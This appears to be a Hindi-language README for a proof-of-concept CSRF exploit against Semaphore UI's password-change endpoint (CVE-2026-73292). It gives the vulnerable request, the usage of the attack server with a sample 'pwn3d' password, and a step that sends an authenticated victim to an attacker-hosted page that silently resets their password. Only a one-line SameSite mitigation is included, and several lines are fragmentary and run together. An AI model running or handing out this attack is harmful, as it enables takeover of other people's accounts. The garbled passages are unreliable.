
CVE-2026-73292 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट: Semaphore UI पासवर्ड परिवर्तन एंडपॉइंट पर CSRF हमला, एक दुर्भावनापूर्ण पेज परोसता है जो प्रमाणित उपयोगकर्ता के पासवर्ड को चुपचाप रीसेट कर देता है।
केवल शैक्षिक और जिम्मेदार प्रकटीकरण उद्देश्यों के लिए।
यह भेद्यता GHSA-8cj9-r88m-8945 में रिपोर्ट की गई है और यह 2.18.21 से नीचे के semaphoreui संस्करणों को प्रभावित करती है।
सेमाफोर UI का पासवर्ड परिवर्तन एंडपॉइंट किसी भी CSRF सुरक्षा को लागू नहीं करता है:
semaphore) पर निर्भर करता है जिसमें कोई SameSite प्रवर्तन नहीं हैएक दुर्भावनापूर्ण पृष्ठ उस पर जाने वाले किसी भी प्रमाणित उपयोगकर्ता का पासवर्ड चुपचाप बदल सकता है।
प्रभावित एंडपॉइंट: POST /api/users/{id}/password
{"password": "newpassword", "project_id": 1}
python poc_server.py -u http://TARGET:3000 -i USER_ID [-n NEW_PASSWORD] [-p PORT]
| तर्क | विवरण | डिफ़ॉल्ट |
|---|---|---|
-u / --uri | सेमाफोर इंस्टेंस का आधार URL | आवश्यक |
-i / --user_id | लक्षित उपयोगकर्ता का ID | आवश्यक |
-n / --new_password | सेट किया जाने वाला पासवर्ड | passwordchanged |
-p / --port | दुर्भावनापूर्ण पृष्ठ को सर्व करने के लिए पोर्ट | 1337 |
python poc_server.py -u http://192.168.1.10:3000 -i 1 -n pwn3d -p 1337
फिर पीड़ित (सेमाफोर पर प्रमाणित) को http://ATTACKER:1337 पर भेजें। पृष्ठ लोड होते ही उनका पासवर्ड तुरंत बदल जाता है।
python poc.py -u http://TARGET:3000 -i 1
http://ATTACKER:1337 पर नेविगेट करें/api/users/1/password पर एक POST को HTTP 204 लौटाते हुए देखेंSameSite=Strict सेट करें